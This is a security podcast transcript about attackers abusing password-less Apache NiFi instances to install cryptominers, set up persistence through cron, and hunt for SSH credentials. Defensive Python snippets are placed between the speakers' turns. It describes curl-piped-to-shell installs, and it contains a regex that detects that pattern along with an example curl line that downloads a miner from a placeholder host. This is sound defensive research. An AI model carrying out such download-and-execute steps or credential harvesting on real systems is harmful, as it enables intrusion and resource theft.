Research Saturday 6.17.23
Ep 286 | 6.17.23

Managing machine learning risks.


Dave Bittner: Hello, everyone, and welcome to the CyberWire's "Research Saturday". I'm Dave Bittner, and this is our weekly conversation with researchers and analysts tracking down the threats and vulnerabilities, solving some of the hard problems, and protecting ourselves in a rapidly evolving cyberspace. Thanks for joining us.

Johannes Ullrich: What we saw is in our honeypot network, we sort of get alerts whenever there's a new kind of URL that is being probed, generally by bots, and one of the URLs that sort of caused a spike here was called /NiFi, which of course, initially didn't really ring a bell, but then doing some digging into it, we figured out that this is likely going after Apache NiFi, which is often described as a data orchestration platform.

Dave Bittner: That's Johannes Ullrich. He's the Dean of Research at the SANS Technology Institute. The research we're discussing today is titled Machine Learning Risks, Attacks against Apache NiFi.

Yeah, I have to admit NiFi was a new one to me. It had me running to search for exactly what it was. Can you describe to us what is the general use case for Apache NiFi?

Johannes Ullrich: Yeah, so a little bit of history here. It actually was developed by the NSA, who open sourced it about 10 years ago, and the Apache project sort of took over maintenance of it. It's described as a data orchestration platform. What it does, it reads data from a large number of sources, whether that's like cloud storage, databases, and such. You can filter it. You can extract subsets of the data, and it'll save it back and -- or send it back to some destination. And again, you have a wide range here. So use cases are, for example, in business data, you receive data from a database that you then need to adapt in order to use it, for example, in some kind of analytic system. It's also often used these days in machine learning, because you have these large data sets that you need to adapt in order to then process them in your machine-learning algorithm, so these are some of the use cases here. It's written in Java, and one of the nice things about it is you don't really need to do a lot of coding with it. It sort of presents a GUI web interface. You can sort of drag and drop your sources. You can configure credentials for your S3 bucket and tell it hey, you know, read that JSON file, pull it out there, turn it into an XML file that maybe my enterprise resource planning system can read.

Dave Bittner: Well, let's walk through this together. I mean, as you say, you were noticing some things on your honeypots. Where did it go from there?

Johannes Ullrich: Well, then of course, we wanted to figure out, what's it actually attempting to do here? They're definitely looking for NiFi, but why is, of course, the next question. There is, of course, some interesting data often in these NiFi systems. So what we did is we set up an actual NiFi instance. The problem of course, with this sort of full-interaction honeypot, is you can't really set up a lot of them. We set up one of them, but in our honeypot network, we have sort of the feature where we can redirect queries from the honeypots to a system like this. So a subset of the honeypots were now set up so that whenever they saw something going to port 8080 or 8443, which are default ports for Apache NiFi, whenever they saw something, well they were just proxying it to our real NiFi instance, which we were able to monitor. And, of course, the attacker, well, they couldn't tell that this was a honeypot anymore. They considered that a real NiFi instance. It's actually -- well, it was. It was a real full-feature --

Dave Bittner: Right.

Johannes Ullrich: -- NiFi instance.
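
The forwarding rule described above can be sketched roughly as follows. This is only an illustration, not the researchers' actual setup: the backend address `REAL_NIFI_HOST`, the `forwarding_enabled` flag, and the function name are all hypothetical. Only the two default ports come from the conversation.

```python
from typing import Optional, Tuple

# Default NiFi ports mentioned in the interview.
NIFI_DEFAULT_PORTS = frozenset({8080, 8443})

# Hypothetical address of the single full-interaction NiFi instance
# (a documentation-range IP, not a real host).
REAL_NIFI_HOST = "198.51.100.7"


def pick_upstream(dest_port: int, forwarding_enabled: bool) -> Optional[Tuple[str, int]]:
    """Return the (host, port) to proxy a connection to, or None.

    Only honeypots in the forwarding subset (forwarding_enabled=True)
    pass traffic on the NiFi default ports to the real instance; all
    other traffic stays on the low-interaction honeypot.
    """
    if forwarding_enabled and dest_port in NIFI_DEFAULT_PORTS:
        return (REAL_NIFI_HOST, dest_port)
    return None
```

Keeping the decision in one small function means a single real instance can sit behind many sensors, which matches the constraint that full-interaction honeypots are hard to run in large numbers.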

Dave Bittner: So you see them coming in and searching for this, and when they hit the NiFi instance, what do they do?

Johannes Ullrich: Well, there are sort of two things we saw. One thing was they installed a cryptocoin miner, of course. It was a little bit of a letdown initially, I have to admit, because that's what everybody does.

Dave Bittner: Right, right.

Johannes Ullrich: And they used a feature. It's not a vulnerability. So I want to point out here that at no time did they actually abuse a vulnerability or some kind of zero-day or such here. We had a completely patched and up-to-date version of NiFi but -- well, NiFi has sort of a feature built in that allows you to execute code, and that's a sort of processor that you can set up to process your data, where you can basically load scripts that will process your data, and with that, you have the ability to run arbitrary code. The real problem here is that the attacker, well, took advantage of NiFi not requiring a password to actually access it. Setting one is highly recommended in the documentation, but who reads the manual, kind of, so?

Dave Bittner: So I mean, is this primarily a configuration issue where folks who are making use of this are neglecting to properly secure it or exposing it to the internet to begin with?

Johannes Ullrich: I think both. So you never really should expose something like this to the internet. It's a very complex system. It had vulnerabilities in the past, nothing really super critical, so they have done a reasonably good job there, but the number one problem is that configuration issue, that you didn't configure a password, and it's not hard. Like I said, there is documentation for it. They have a simple command to set up a password. So it's not really all that difficult. It becomes a real problem if you actually process real data with NiFi, because now the attacker not only has access to the data, but also credentials, because in order for NiFi to access the data, well, NiFi needs to know how to connect to that database, how to connect to that S3 bucket. That information, an attacker could also retrieve from NiFi, if there's no password or a weak password. The other thing we then saw is that in addition to installing a cryptocoin miner -- like I said, that was sort of a little bit of a letdown -- which is what most of them did, there were a couple of attackers that also used NiFi to then probe the network.

Dave Bittner: Huh.

Johannes Ullrich: So once they had control of the NiFi server, they then also attempted lateral movement, where they'll search the NiFi server for credentials, in particular SSH keys. They looked at, hey, did anybody log in to this NiFi server and then connect anywhere else via SSH? So they went all through the account and host combinations there and basically tried to abuse any of them to gain additional access to systems.
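
To get a feel for what such a search could turn up, a defender might list the hosts an account's SSH `known_hosts` file reveals in plain text. The sketch below is an assumption about where host information might live; the conversation does not say which files the attackers actually read, and the function name is hypothetical. It relies on the OpenSSH convention that hashed entries start with `|1|`.

```python
def plaintext_known_hosts(known_hosts_text: str) -> list[str]:
    """List host names/addresses readable in an OpenSSH known_hosts file.

    Hashed entries (beginning with "|1|") do not reveal the host name
    and are skipped; everything returned here is visible to anyone who
    can read the file.
    """
    hosts: list[str] = []
    for line in known_hosts_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue  # blank line or comment
        fields = line.split()
        if fields[0].startswith("@"):
            fields = fields[1:]  # drop an optional marker such as @cert-authority
        if not fields or fields[0].startswith("|1|"):
            continue  # nothing left, or a hashed host entry
        for host in fields[0].split(","):
            if host not in hosts:
                hosts.append(host)
    return hosts
```

An empty result does not mean the server is safe, since shell history, SSH client configuration, and private keys can expose the same account and host combinations.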

[ Music ]

Dave Bittner: Now, for the folks who are running this NiFi instance, say someone comes in and drops a cryptominer in, does that -- I mean, is it obvious that that has happened or does it run quietly behind the scenes?

Johannes Ullrich: Well, it depends on how carefully you look. Within the GUI, you will see these processors that the attacker set up. So that's something that you should notice. Of course, if you have a very complex instance, there may be tons of processors you already have configured. It may not be that obvious that you actually have a new one here and it wasn't authorized. In the case that we observed, the attacker also set up a cron job in order to have sort of a backup in case that process gets deleted or, you know, NiFi gets removed from that system. The cron job would run once a minute and try to reinstall things again. Overall, this was fairly noisy, so an administrator should be able to notice that if they're watching. Let's face it. They didn't start by setting up a password for it so --

Dave Bittner: Fair enough.

Johannes Ullrich: -- who knows what else is missing there. And, you know, of course, there are all the network connections outbound from that system and such, which may or may not be notable, depending on, you know, how noisy your network is in general.
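
One way an administrator might look for the once-a-minute cron job mentioned above is to list every crontab entry scheduled to run each minute and review the commands by hand. This is a minimal sketch, assuming the user crontab format (five schedule fields followed by the command); the function name is hypothetical, and for system crontabs such as /etc/crontab the returned text would also include the user field.

```python
def every_minute_jobs(crontab_text: str) -> list[str]:
    """Return the commands of crontab entries that run every minute."""
    jobs: list[str] = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue  # blank line or comment
        fields = line.split(None, 5)
        if len(fields) < 6:
            continue  # environment assignment, @reboot-style entry, or malformed
        schedule, command = fields[:5], fields[5]
        # "* * * * *" (or the equivalent "*/1") means once a minute.
        if all(field in ("*", "*/1") for field in schedule):
            jobs.append(command)
    return jobs
```

Running every minute is not malicious in itself, so the output is a shortlist for review rather than a verdict.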

Dave Bittner: Yeah. Now, in your research, correct me if I'm wrong here, this is all running in RAM, so it's trying to hide itself that way?

Johannes Ullrich: Yeah, so the install script that's being downloaded is never saved to disk. It's a simple bash script. It just uses curl, the command line command to retrieve commands or retrieve files via HTTP, and pipes it directly to sh, to the shell, so that's never being saved. The cryptocoin miner they're downloading is being saved. Some of the other things like the SSH scanning of other machines, also, no real files being saved here. It does the same thing. It just downloads it via curl and pipes it directly to shell, so while you may find some sort of miscellaneous evidence of this, there is no actual sort of file being saved on the system.
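
Because the script itself never lands on disk, the command line is one of the few places the download-and-pipe pattern shows up, for example in process audit logs or in a cron entry. The following is a rough sketch of matching that pattern; the regular expression and function name are illustrative assumptions, not a signature from the research, and an attacker can evade a simple match like this with quoting or other indirection.

```python
import re

# curl or wget, followed by a pipe into sh, bash, dash, or zsh
# (optionally via sudo), all within one pipeline stage.
PIPE_TO_SHELL = re.compile(
    r"\b(?:curl|wget)\b[^|;&\n]*\|\s*(?:sudo\s+)?(?:ba|da|z)?sh\b"
)


def looks_like_pipe_to_shell(command_line: str) -> bool:
    """Return True if a downloader's output is piped straight into a shell."""
    return PIPE_TO_SHELL.search(command_line) is not None
```

A download that writes to a file, such as `curl -o miner http://example.invalid/miner`, does not match, which fits the description that the miner binary is saved to disk while the install script is not.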

Dave Bittner: Yeah. I mean, is it fair to say from your description here that we're looking at opportunists, basically? This isn't a high level of sophistication?

Johannes Ullrich: Correct. This looks like opportunists. Cryptocoin miner, of course, could also be sort of their last resort, kind of, if they don't find anything else interesting to do with this instance, and our instance didn't really have any interesting data, so they say, you know, let's make some cryptocoins while we're in here, and sort of use it this way. The interesting part was there was really just one attacker who is really heavily scanning for this. Also, we then sort of went through some searching to see really, you know, who's actually exposing NiFi and found a lot of sort of cloud instances like technoloader and such where people had NiFi set up, and that's of course, where the entire issue with blocking attacks becomes more tricky because, well, now your NiFi instance is in the cloud. You have to connect to it via the open internet unless you set up some careful IP address filtering, which you easily get wrong, and then you lose access to it. So that may be one reason why there are these exposed NiFi instances.

Dave Bittner: Yeah, that's interesting. Any idea who is behind this? You said it seems to be coming from one place primarily?

Johannes Ullrich: Yeah, we saw sort of a lot of sort of Russian IPs, as far as the infrastructure where all of the hosts are located, where all the scripts are being loaded from. Some Ukrainian hosts, one in particular does a lot of scanning for us these days. Sometimes geolocation with Ukraine versus Russia can be a little bit tricky here. Hadn't really looked that closely into it, but hadn't really sort of found any strong evidence as far as nationality or so goes. It's using commodity malware. Like this cryptocoin miner is fairly commonly found, so I'm not really sure if that's one actor or another. It could be anybody.

Dave Bittner: Yeah. Any notion of how widespread this is?

Johannes Ullrich: Well, like I said, we really see one attacker who is trying it really hard. As far as open NiFi instances, a sort of quick scan of the standard search engines shows a couple hundred maybe that are out there that are open sort of to the public on default ports. Hadn't really looked too closely at how many are maybe hiding a little bit on slightly different URLs, but this attacker really seems to go sort of for these default instances. This could also be something where an attacker, once they gain access to a network, is looking for these NiFi instances, because after all, they will allow that arbitrary code execution, so that would be, rather than an initial attack, sort of lateral movement again, for an attacker who breached a network with a NiFi instance.

Dave Bittner: Right, right. I'm here. While I'm here, I might as well drop a cryptocurrency miner, right?

Johannes Ullrich: Yeah, or just to look for any data being touched by NiFi, and that's sort of something we'll probably do in the future: put some credentials in there and see if they're then being used.

Dave Bittner: Right. So what are the recommendations then for folks who are using Apache NiFi, what sort of things should they be looking out for here?

Johannes Ullrich: I think the number one thing is right now just inventory, that's sort of one problem here. You may find, you know, data scientists, people in like business analytics and such that set up NiFi instances in the cloud without necessarily -- so it's that rogue IT kind of issue where they don't necessarily properly account for it, and so it never really gets properly configured and patched and all of that good stuff, but the number one thing is if you have NiFi, put a password in there. Even a weak password is better than no password, but while you're at it --

Dave Bittner: Right.

Johannes Ullrich: -- pick something a little bit better than NiFi kind of as a password.

Dave Bittner: Right, NiFi1, yeah.

Johannes Ullrich: Yeah.

Dave Bittner: Right, while you're putting in a password, oh, what the heck, make it a strong one.

Johannes Ullrich: Yes. I don't think there's much sort of in terms of strong authentication yet, but I haven't really looked into how it sort of would integrate with any kind of SSO or such.

Dave Bittner: Right, right. It's really an interesting case here because, I mean, obviously a legitimate tool, not terribly widespread usage it would seem, and yet, you know, some clever hacker out there has found a way to use it to their advantage. I suppose it's kind of a cautionary tale.

Johannes Ullrich: Yeah, and that's really just if it's out there, if it's vulnerable, they'll find it and they may find it before you find it, and that's one of the big problems.

Dave Bittner: Our thanks to Johannes Ullrich from the SANS Technology Institute for joining us. The research is titled Machine Learning Risks, Attacks Against Apache NiFi. We'll have a link in the show notes.

The CyberWire "Research Saturday" Podcast is a production of N2K Networks, proudly produced in Maryland out of the startup studios of DataTribe, where they're co-building the next generation of cybersecurity teams and technologies. This episode was produced by Liz Irvin and Senior Producer Jennifer Eiben. Our mixer is Elliott Peltzman. Our Executive Editor is Peter Kilpe, and I'm Dave Bittner. Thanks for listening.